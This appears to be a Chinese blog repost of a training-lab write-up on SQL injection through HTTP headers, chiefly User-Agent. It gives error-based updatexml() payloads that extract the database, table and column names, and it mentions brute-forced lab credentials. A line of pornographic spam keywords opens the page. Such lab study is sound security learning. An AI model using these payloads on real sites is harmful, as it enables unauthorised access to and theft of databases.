国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

掌控安全 -- header注入

這篇具有很好參考價值的文章主要介紹了掌控安全 -- header注入。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

http header注入

????????該注入是指利用后端驗證客戶端口信息(比如常用的cookie驗證)或者通過http header中獲取客戶端的一些信息(比如useragent用戶代理等其他http header字段信息),因為這些信息是會重新返回拼接到后臺中的,所以再對這些信息進(jìn)行sql處理,又因為后臺沒有進(jìn)過相對應(yīng)的信息處理所以構(gòu)成了sql注入。

總結(jié)就是:?在傳參時,后端為了驗證或者獲取客戶端的一些信息,將這些信息存入到數(shù)據(jù)庫但沒有進(jìn)行相關(guān)的處理,所以存在了header注入

User-Agent:

向服務(wù)器發(fā)送,包含了訪問者系統(tǒng)引擎版本、瀏覽器信息的字段信息。一般服務(wù)器識別出是爬蟲請求,會拒絕訪問。所以此時設(shè)置User-Agent,可以將爬蟲偽裝成用戶通過瀏覽器訪問。

X-Forwarded-For 是一個 HTTP 擴(kuò)展頭部,主要是為了讓 Web 服務(wù)器獲取訪問用戶的真實 IP 地址.

updatexml (XML_document, XPath_string, new_value);?

第一個參數(shù):XML_document是String格式,為XML文檔對象的名稱

第二個參數(shù):XPath_string (Xpath格式的字符串)

第三個參數(shù):new_value,String格式,替換查找到的符合條件的數(shù)據(jù)

updatexml() 更新xml文檔的函數(shù)
語法:updatexml(目標(biāo)xml內(nèi)容,xml文檔路徑,更新的內(nèi)容)
構(gòu)建語句
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

通過爆破我們知道username 和 password 為 admin? 123456

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

而insert into 在登錄之后才能執(zhí)行,也就是靶場在登錄之后才能執(zhí)行head注入

然而我們發(fā)現(xiàn) 在User-agent后邊拼接字符串他的頁面會報錯,所以知道了在UA這里存在注入

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

當(dāng)我們發(fā)現(xiàn)將User-agent改為?1','2') -- 1的時候 會繞過過濾,頁面顯示正常

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1),'2') -- 1

查詢庫名

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

這里and和or需要都試一下

然后獲取到表名

'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x7e),1),'2') -- 1

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

'or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='flag_head'limit 0,1),0x7e),1),'2') -- 1

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

爆數(shù)據(jù)

掌控安全 -- header注入,安全,網(wǎng)絡(luò)安全,數(shù)據(jù)庫,sql

然后就出來了文章來源地址http://www.zghlxwxcb.cn/news/detail-759175.html

到了這里,關(guān)于掌控安全 -- header注入的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 網(wǎng)絡(luò)安全 Day21-數(shù)據(jù)庫知識

    數(shù)據(jù)庫是存儲數(shù)據(jù)的倉庫,這個倉庫更特別 儲存靜態(tài)數(shù)據(jù) 存儲服務(wù)器上:圖片,視頻,壓縮包 web服務(wù)器上: html,js,css,php,python,java 數(shù)據(jù)庫里:文本:文章、訂單、商品 進(jìn)行交互動態(tài)數(shù)據(jù) 電商網(wǎng)站,這些功能都必須要數(shù)據(jù)庫來交互。注冊會員、登錄會員、購買訂單、支付、物流跟

    2024年02月15日
    瀏覽(58)
  • 網(wǎng)絡(luò)安全等保:Oracle數(shù)據(jù)庫測評

    網(wǎng)絡(luò)安全等保:Oracle數(shù)據(jù)庫測評

    以下結(jié)果以O(shè)racle 11g為例,通過PL/SQL進(jìn)行管理,未進(jìn)行任何配置、按照等保2.0標(biāo)準(zhǔn),2021報告模板,三級系統(tǒng)要求進(jìn)行測評。 a) 應(yīng)對登錄的用戶進(jìn)行身份標(biāo)識和鑒別,身份標(biāo)識具有唯一性,身份鑒別信息具有復(fù)雜度要求并定期更換; sysdba是Oracle數(shù)據(jù)庫的最高權(quán)限管理員。通常使

    2024年02月13日
    瀏覽(28)
  • 《網(wǎng)絡(luò)安全》- 3.1 - Redis數(shù)據(jù)庫詳細(xì)教程

    「作者簡介」: CSDN top100、阿里云博客專家、華為云享專家、網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者 「訂閱專欄」: 此文章已錄入專欄《網(wǎng)絡(luò)安全入門到精通》

    2023年04月08日
    瀏覽(18)
  • 網(wǎng)絡(luò)安全 Day22-mariadb數(shù)據(jù)庫用戶管理

    用戶的格式: 用戶@主機(jī)范圍 合起來才算一個用戶 授權(quán)主機(jī)范圍 只能從本機(jī)訪問: localhost 或 127.0.0.1 或 10.0.0.166 (指定IP) 授權(quán)整個網(wǎng)段: 授權(quán)10.0.0.1–10.0.0.254: 10.0.0.0/24 或 10.0.0.% 授權(quán)192.168.0.1—192.168.254.254: 192.168.% 嚴(yán)令 禁止 直接使用 % 用戶增刪改查 創(chuàng)建用戶 語法: create user b

    2024年02月14日
    瀏覽(46)
  • 【網(wǎng)絡(luò)安全】SQL注入--堆疊注入

    【網(wǎng)絡(luò)安全】SQL注入--堆疊注入

    堆疊注入就是可以同時執(zhí)行多條語句,危害較大,利用此漏洞可以進(jìn)行刪庫或者修改數(shù)據(jù)庫信息 查詢存在多少字段 使用聯(lián)合查詢獲取表名 使用聯(lián)合查詢獲取字段名稱 使用堆疊注入添加賬號密碼

    2023年04月09日
    瀏覽(35)
  • 【網(wǎng)絡(luò)安全】SQL注入--寬字節(jié)注入

    【網(wǎng)絡(luò)安全】SQL注入--寬字節(jié)注入

    寬字節(jié)注入,在 SQL 進(jìn)行防注入的時候,一般會開啟 gpc,過濾特殊字符。 一般情況下開啟 gpc 是可以防御很多字符串型的注入,但是如果數(shù)據(jù)庫編碼不 對,也可以導(dǎo)致 SQL 防注入繞過,達(dá)到注入的目的。如果數(shù)據(jù)庫設(shè)置寬字節(jié)字 符集 gbk 會導(dǎo)致寬字節(jié)注入,從而逃逸 gpc 前提

    2023年04月13日
    瀏覽(57)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn))

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn))

    知識點: 1、服務(wù)攻防數(shù)據(jù)庫類型安全 2、influxdb,.未授權(quán)訪問wt驗證 3、H2 database-未授權(quán)訪問-配置不當(dāng) 4、CouchDB-權(quán)限繞過配合RCE-漏洞 5、ElasticSearch-文件寫入RCE-漏洞 #章節(jié)內(nèi)容: 常見服務(wù)應(yīng)用的安全測試: 1、配置不當(dāng)-未授權(quán)訪問 2、安全機(jī)制特定安全漏洞 3、安全機(jī)制弱口令

    2024年01月23日
    瀏覽(45)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    知識點: 1、服務(wù)攻防數(shù)據(jù)庫類型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不當(dāng)未授權(quán)三重奏RCE漏洞 3、Redis-配置不當(dāng)未授權(quán)三重奏RCE兩漏洞 #章節(jié)內(nèi)容: 常見服務(wù)應(yīng)用的安全測試: 1、配置不當(dāng)-未授權(quán)訪問 2、安全機(jī)制特定安全漏洞 3、安全機(jī)制弱口令爆

    2024年01月23日
    瀏覽(29)
  • 網(wǎng)絡(luò)安全---SQL注入攻擊

    網(wǎng)絡(luò)安全---SQL注入攻擊

    ????????SQL 注入是一種代碼注入技術(shù),可利用 Web 應(yīng)用程序和數(shù)據(jù)庫服務(wù)器之間接口中的漏洞。當(dāng)用戶的輸入在發(fā)送到后端數(shù)據(jù)庫服務(wù)器之前未在 Web 應(yīng)用程序中正確檢查時,該漏洞就存在。 ????????許多 Web 應(yīng)用程序從用戶處獲取輸入,然后使用這些輸入構(gòu)建 SQL 查詢

    2024年04月12日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】SQL注入詳解

    【網(wǎng)絡(luò)安全】SQL注入詳解

    SQL注入是比較常見的網(wǎng)絡(luò)攻擊方式之一,它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊,而是針對程序員編寫時的疏忽,通過SQL語句,實現(xiàn)無賬號登錄,甚至篡改數(shù)據(jù)庫。 1:尋找到SQL注入的位置 2:判斷服務(wù)器類型和后臺數(shù)據(jù)庫類型 3:針對不同的服務(wù)器和數(shù)據(jù)庫特點進(jìn)行SQL注入攻擊

    2024年02月06日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包